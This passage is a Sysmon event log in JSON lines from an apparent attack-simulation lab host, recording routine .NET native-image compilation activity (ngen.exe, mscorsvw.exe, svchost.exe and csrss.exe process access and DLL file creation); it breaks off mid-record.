{"EventTime":"2020-08-01 08:04:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6711,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:05.851\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21F5-5F25-0000-00105A8E0A00}\r\nTargetProcessId: 4124\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:05.851","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21F5-5F25-0000-00105A8E0A00}","TargetProcessId":"4124","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:05","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6712,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:04:05.992\r\nProcessGuid: {41C8662E-21F5-5F25-0000-00105A8E0A00}\r\nProcessId: 4124\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\101c-0\\System.Configuration.Install.dll\r\nCreationUtcTime: 2020-08-01 08:04:05.992","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:04:05.992","ProcessGuid":"{41C8662E-21F5-5F25-0000-00105A8E0A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\101c-0\\System.Configuration.Install.dll","CreationUtcTime":"2020-08-01 08:04:05.992","EventReceivedTime":"2020-08-01 08:04:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6713,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:06.023\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21F6-5F25-0000-0010DB920A00}\r\nTargetProcessId: 2992\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:06.023","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21F6-5F25-0000-0010DB920A00}","TargetProcessId":"2992","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6714,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:06.023\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21F6-5F25-0000-0010DB920A00}\r\nTargetProcessId: 2992\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:06.023","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21F6-5F25-0000-0010DB920A00}","TargetProcessId":"2992","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6715,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:06.039\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21F6-5F25-0000-0010DB920A00}\r\nTargetProcessId: 2992\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:06.039","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21F6-5F25-0000-0010DB920A00}","TargetProcessId":"2992","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6716,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:06.086\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21F6-5F25-0000-001005960A00}\r\nTargetProcessId: 4200\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:06.086","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21F6-5F25-0000-001005960A00}","TargetProcessId":"4200","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6717,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:06.086\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21F6-5F25-0000-001005960A00}\r\nTargetProcessId: 4200\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:06.086","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21F6-5F25-0000-001005960A00}","TargetProcessId":"4200","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6718,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:06.101\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21F6-5F25-0000-001005960A00}\r\nTargetProcessId: 4200\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:06.101","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21F6-5F25-0000-001005960A00}","TargetProcessId":"4200","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6719,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:04:07.492\r\nProcessGuid: {41C8662E-21F6-5F25-0000-001005960A00}\r\nProcessId: 4200\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1068-0\\System.Xaml.dll\r\nCreationUtcTime: 2020-08-01 08:04:07.492","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:04:07.492","ProcessGuid":"{41C8662E-21F6-5F25-0000-001005960A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1068-0\\System.Xaml.dll","CreationUtcTime":"2020-08-01 08:04:07.492","EventReceivedTime":"2020-08-01 08:04:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6720,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:07.539\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21F7-5F25-0000-0010F4990A00}\r\nTargetProcessId: 3008\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: 